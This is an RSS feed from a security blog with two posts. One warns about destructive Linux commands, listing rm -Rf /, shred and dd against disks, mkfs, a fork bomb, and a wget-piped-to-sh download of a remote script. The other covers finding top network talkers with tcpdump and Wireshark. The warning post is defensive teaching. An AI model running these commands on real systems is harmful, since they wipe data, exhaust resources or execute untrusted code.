<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>unix Archives - ITBlogSec.com</title>
	<atom:link href="https://itblogsec.com/tag/unix/feed/" rel="self" type="application/rss+xml" />
	<link>https://itblogsec.com/tag/unix/</link>
	<description>IT, network, security and hacking</description>
	<lastBuildDate>Mon, 04 May 2020 14:10:17 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>
	<item>
		<title>10 most dangerous linux commands you should never run</title>
		<link>https://itblogsec.com/10-dangerous-linux-commands-never-run/</link>
					<comments>https://itblogsec.com/10-dangerous-linux-commands-never-run/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 16 Jun 2017 19:36:50 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[unix]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=910</guid>

					<description><![CDATA[<p>There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.</p>
<p>The post <a href="https://itblogsec.com/10-dangerous-linux-commands-never-run/">10 most dangerous linux commands you should never run</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>10 most dangerous linux commands you should never run</h2>
<p style="text-align: justify;">There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.</p>
<h3>Irreversible Linux Commands – The Most Dangerous Ones</h3>
<pre class="lang:default decode:true">rm -Rf /</pre>
<p style="text-align: justify;">This command has gained a lot of notoriety, and is particularly dangerous. Thankfully, many UNIX systems have placed a safeguard into the rm command to ensure that it doesn’t happen accidentally or unintentionally. It might be confusing to think that something so destructive could be run accidentally, but it’s really as simple as using an uninitialized variable in a BASH script and not checking it before running the command.</p>
<pre class="lang:default decode:true">shred /dev/sda</pre>
<p style="text-align: justify;">Shred is a particularly dangerous command, unlike in the case of rm where anyone with some data recovery knowledge can data-carve the volume for any important files, shred does just as the name suggests. Shred feeds off of the operating systems /dev/random or /dev/urandom to generate random information. This information is then used to overwrite the drive in several passes rendering the data irretrievable. Even if you manage to interrupt the process before it gets through too much of your data, you’ll still have to rebuild your partition table and repair any filesystems that may have been touched. Shred is certainly a dangerous command if not used carefully.</p>
<pre class="lang:default decode:true">dd if=/dev/random of=/dev/sda</pre>
<p style="text-align: justify;">dd is an amazingly useful tool. It can be used for making clones of volumes, filesystems, writing images to disks, and even erasing <span class="skimlinks-unlinked">drives.The</span> above dd command accomplishes something that is about the same as shred, with the only differences being that shred is much faster and does multiple passes by default.</p>
<pre class="lang:default decode:true">mkfs.ext4 /dev/sda1</pre>
<p style="text-align: justify;">As Picasso said, “every act of creation is first an act of destruction,” and the same is true with mkfs. The fault here doesn’t lie with ext4 particularly, only that in order to create a new filesystem you must discard all existing data on the volume. This obviously isn’t a trouble on a shiny new disk, but it can bring a running system to its knees if it’s used without discretion.</p>
<pre class="lang:default decode:true">mv / /dev/null</pre>
<p style="text-align: justify;">This one is on par with our first. Anything written to /dev/null will write successfully. This means that this command is effectively the same as our first, although it might take longer to accomplish.</p>
<h3>Dangerous, Although Reversible Linux Commands</h3>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">:(){:|:&amp;};:</pre>
<p style="text-align: justify;"><span style="text-align: justify;">This cryptic string is BASH wizardry at it’s most evil and arcane. It’s known by the common name of the BASH Fork Bomb. Its other names are Rabbit Virus or Wabbit. Its construction is elegant and deadly, bringing any system to halt if the proper security measures aren’t put in place. The command simply creates a function named : with the :() in the beginning, it then goes on to define the contents of the function with {:|:&amp;}, this again is very simple as it only executes itself and pipes into another call of itself while backgrounding the process. Finally, the function definition is terminated with the ; and called with the :. To defend against this type of attack you need to implements precautions in the /etc/security/</span><span class="skimlinks-unlinked" style="text-align: justify;">limits.conf</span><span style="text-align: justify;"> configuration file.</span></p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">wget http://unknownsource.com/possiblydangerous.sh -O- | sh</pre>
<p style="text-align: justify;">This one should be a no-brainer. While wget is a useful tool, anything you download, especially executables, should be inspected if they come from an unknown or untrusted source. This command downloads the script and pipes it into sh which is usually just a symbolic link to BASH. So, anything in the script will be executed provided the user has sufficient privilege. The contents of the script would quite possibly be any of the previously mentioned commands.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">gunzip untrusted.gz</pre>
<p style="text-align: justify;">The seldom known Decompression Bomb is pretty unique in its approach. Compression relies on order in information to compress at higher ratios, considering that, a file filled with ones or zeros would be able to be compressed to a very high ratio, the resulting file could be orders smaller than the original. And that’s exactly what the Decompression Bomb is. It is a file that when decompressed will fill the disk space. On a Linux machine, this can be fatal to many system services that require logging or writing to a file. For that reason, decompressing any untrusted file can be very dangerous.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">command &gt; file.conf</pre>
<p style="text-align: justify;">The redirection feature of BASH is extremely useful, but when it’s used without care, it can end up wiping out an important configuration file. Remembering to distinguish between &gt; and &gt;&gt;, or replace and append, can be difficult to the beginner. It’s even common for professionals to overlook it and lose files. That’s why you should always double check, or even triple check, the commands you run.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">^mistake^correction</pre>
<p style="text-align: justify;">This is a substitution to correct a mistake made in the previous command. It’s not something to keep at the top of your toolbox, but it’s something particularly handy when running long commands. The danger here comes from the fact that it can substitute malicious content into previously run commands, so it’s especially important to be diligent in inspecting both the previous command and the substitution.</p>
<p><span style="color: #ff0000;"><strong>| READ ALSO:</strong></span> <a href="https://itblogsec.com/how-to-put-currently-running-process-to-background/" target="_blank" rel="noopener">How to put currently running process to background</a></p>
</div>
</div>
<p style="text-align: justify;">Surely, there are many more commands that can disrupt or permanently impair a system. Did we miss any big ones? Do you know of any obscure ones? Let us know in the comments below.</p>
<p><span style="font-size: 10pt;"><strong>source: </strong><a href="https://fossbytes.com" target="_blank" rel="noopener">https://fossbytes.com</a></span></p>
<p>The post <a href="https://itblogsec.com/10-dangerous-linux-commands-never-run/">10 most dangerous linux commands you should never run</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/10-dangerous-linux-commands-never-run/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to find out TOP talkers in your network</title>
		<link>https://itblogsec.com/top-talkers-by-using-tcpdump/</link>
					<comments>https://itblogsec.com/top-talkers-by-using-tcpdump/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 30 Dec 2016 22:44:59 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[tcpdump]]></category>
		<category><![CDATA[top talkers]]></category>
		<category><![CDATA[unix]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=21</guid>

					<description><![CDATA[<p>Sometimes it is very useful to find out current top talkers in your network. You can figure out what it's going on and what IP can be possible source of congestion.</p>
<p>The post <a href="https://itblogsec.com/top-talkers-by-using-tcpdump/">How to find out TOP talkers in your network</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>How to find out TOP talkers in your network</h2>
<p style="text-align: justify;">Sometimes it is very useful to find out current top talkers in your network, affecting your local interface. You can figure out what it&#8217;s going on and what IP can be possible source of congestion.</p>
<h3>UNIX/LINUX procedure</h3>
<p>Issue following command, by parameter -c you can configure amount of packets what will be captured, by parameter -i specify interface you want to sniff on:</p>
<pre class="lang:default decode:true">sudo tcpdump -tnn -c 40 -i eth0  | awk -F "." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr | head</pre>
<p>&nbsp;</p>
<div id="attachment_369" style="width: 1108px" class="wp-caption alignnone"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-369" class="border-image wp-image-369 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/top_talkers.jpg" width="1098" height="161" srcset="https://itblogsec.com/wp-content/uploads/2016/12/top_talkers.jpg 1098w, https://itblogsec.com/wp-content/uploads/2016/12/top_talkers-300x44.jpg 300w, https://itblogsec.com/wp-content/uploads/2016/12/top_talkers-768x113.jpg 768w, https://itblogsec.com/wp-content/uploads/2016/12/top_talkers-1024x150.jpg 1024w" sizes="(max-width: 1098px) 100vw, 1098px" /><p id="caption-attachment-369" class="wp-caption-text">Output of analyzing 40 packets</p></div>
<p>&nbsp;</p>
<h3>WINDOWS procedure</h3>
<p style="text-align: justify;">In Windows OS we will use well-known application <a href="https://www.wireshark.org/download.html">Wireshark</a>. Normally a network interface will only &#8220;receive&#8221; packets directly addressed to the interface. Promiscuous mode allows the interface to receive all packets that it sees whether they are addressed to the interface or not. By enabling interface in promiscuous mode you can easily sniff traffic and based on further analyse you can figure out who is possible top-talker. It is very useful in case you are experiencing some kind of broadcast (multicast) storm and want to identify source of your congestion.</p>
<div id="attachment_379" style="width: 1146px" class="wp-caption alignnone"><img decoding="async" aria-describedby="caption-attachment-379" class="border-image wp-image-379 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01.png" width="1136" height="582" srcset="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01.png 1136w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01-300x154.png 300w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01-768x393.png 768w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_01-1024x525.png 1024w" sizes="(max-width: 1136px) 100vw, 1136px" /><p id="caption-attachment-379" class="wp-caption-text">Selection of interface and starting packets capture</p></div>
<p><span style="color: #ff0000;">1. Click button to open capture interface settings<br />
</span><span style="color: #ff0000;">2. Select interface which you want to capture traffic on<br />
</span><span style="color: #ff0000;">3. Click &#8220;Start&#8221; button to start capturing</span></p>
<div id="attachment_381" style="width: 1257px" class="wp-caption alignnone"><img decoding="async" aria-describedby="caption-attachment-381" class="border-image wp-image-381 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03.png" width="1247" height="397" srcset="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03.png 1247w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03-300x96.png 300w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03-768x245.png 768w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_03-1024x326.png 1024w" sizes="(max-width: 1247px) 100vw, 1247px" /><p id="caption-attachment-381" class="wp-caption-text">Stopping capture and selecting Conversations</p></div>
<p><span style="color: #ff0000;">4. After a few seconds you can &#8220;Stop&#8221; capturing of traffic</span><br />
<span style="color: #ff0000;">5. Select &#8220;Statistics&#8221;</span><br />
<span style="color: #ff0000;">6. Choose &#8220;Conversations&#8221;</span></p>
<div id="attachment_384" style="width: 1017px" class="wp-caption alignnone"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-384" class="border-image wp-image-384 size-full" src="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04.png" width="1007" height="241" srcset="https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04.png 1007w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04-300x72.png 300w, https://itblogsec.com/wp-content/uploads/2016/12/wireshark_04-768x184.png 768w" sizes="(max-width: 1007px) 100vw, 1007px" /><p id="caption-attachment-384" class="wp-caption-text">Conversations dialog where you can filter and see full statistics of captured packets</p></div>
<p style="text-align: justify;">Simply by selecting desired port, ordering based on &#8220;Bytes&#8221; you can see souce/destination IP which is originating the most packets. Do not forget that you will not be able to see all traffic in your network but you can capture traffic which does not have to be addressed directly to your interface but can influence also your network performance (e.g. broadcast storm &#8230;).</p>
<p>The post <a href="https://itblogsec.com/top-talkers-by-using-tcpdump/">How to find out TOP talkers in your network</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/top-talkers-by-using-tcpdump/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/

Object Caching 0/167 objects using XCache
Page Caching using Disk: Enhanced 

Served from: itblogsec.com @ 2025-12-15 03:47:51 by W3 Total Cache
-->